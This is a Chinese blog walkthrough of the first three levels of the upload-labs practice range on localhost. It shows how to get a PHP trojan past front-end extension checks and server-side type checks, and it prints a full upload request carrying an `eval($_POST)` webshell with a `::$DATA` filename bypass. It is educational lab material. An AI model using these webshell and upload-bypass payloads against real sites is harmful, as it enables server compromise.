【web安全】文件上传漏洞

upload-labs靶场

第一关 绕过前端

先打开哥斯拉,生成木马,选择php

打开brup开浏览器,上传文件,就会发现被阻止了,还没抓到包呢

那就是被前端代码阻止了,那通常前端代码都只能防御后缀名

我们抓到包后直接改回名称即可

那就先复制木马文件,再改成 .png 图片格式结尾

然后打开抓包,上传绕过前端,就能看到抓去的数据包了

改回去php即可

右键查看一下图片,就会发现图片地址都给我们了

bash 复制代码
# 所以木马位置在这里
http://127.0.0.1/upload-labs-master/upload/gesila.php

上哥斯拉测试连接,没毛病,下一题

第二关 绕过后端的类型判断

第二关可以用第一关的方法,但不知道为什么可以,于是看了一下源码,原来是类型绕过了

上传图片的时候,类型自动是图片类型,而这关可以直接用php文件上传

抓包改成图片类型就行了,连后缀名都不需要改

第三关 隐藏流文件双写绕过

上传木马文件,数据包增加下面东西,其实我也没看太懂

但可能会是一个比较实用的技巧

因为我看了一下源代码,源码是用php代码写常量数组判断后缀名是否在数组的后缀名中

所以这是很常见的防御写法这种破解应该是比较实用

完整数据包如下:

bash 复制代码
POST /upload-labs-master/Pass-03/index.php?action=show_code HTTP/1.1
Host: 127.0.0.1
Content-Length: 348
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRSR1Z7D37x0XoKBw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/upload-labs-master/Pass-03/index.php?action=show_code
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ahreltidkjthrep12lbfgq9got
Connection: close

------WebKitFormBoundaryRSR1Z7D37x0XoKBw
Content-Disposition: form-data; name="upload_file"; filename="gesila.php::$DA::$DATATA"
Content-Type: application/octet-stream

<?php
eval($_POST["pass"]);

------WebKitFormBoundaryRSR1Z7D37x0XoKBw
Content-Disposition: form-data; name="submit"

涓婁紶
------WebKitFormBoundaryRSR1Z7D37x0XoKBw--

上传之后需要查看文件名是什么?不然没法搞

这个文件名一半看懂,一半没看懂,原理也没查到

反正前面就是年月日,后面一半就不知道是什么来的了,所以需要看到有文件名才能getshell

相关推荐
网安INF17 分钟前
入侵检测系统(IDS)解析
网络·网络协议·安全·网络安全·ids
catoop35 分钟前
网站安全加固:优化 Nginx 安全头配置
nginx·安全
萤丰信息2 小时前
数智重构生态:智慧园区引领城市高质量发展新范式
java·大数据·人工智能·安全·智慧城市
网安INF2 小时前
典型网络攻击分析:ARP欺骗与TCP劫持
网络·网络协议·tcp/ip·安全·网络安全
一RTOS一2 小时前
我国工业通信自主化突破催生“亿级”市场,筑牢新型工业化安全与发展基石
安全·鸿道操作系统·鸿道实时操作系统·国产嵌入式操作系统选型
九月生3 小时前
基于 Sa-Token 实现 API 接口签名校验(Spring Boot 3 实战)
web安全·springboot
爱编程的小吴3 小时前
华为云安全配置检查清单
安全·华为云
白帽子凯哥哥4 小时前
Misc题目中图片隐写和流量分析的详细工具使用技巧
linux·运维·web安全·网络安全·docker·渗透测试
微爱帮监所写信寄信4 小时前
微爱帮监狱寄信写信小程序工单系统技术方案:智能投诉处理与问题解决平台
人工智能·网络协议·安全·小程序·内容审核·监狱寄信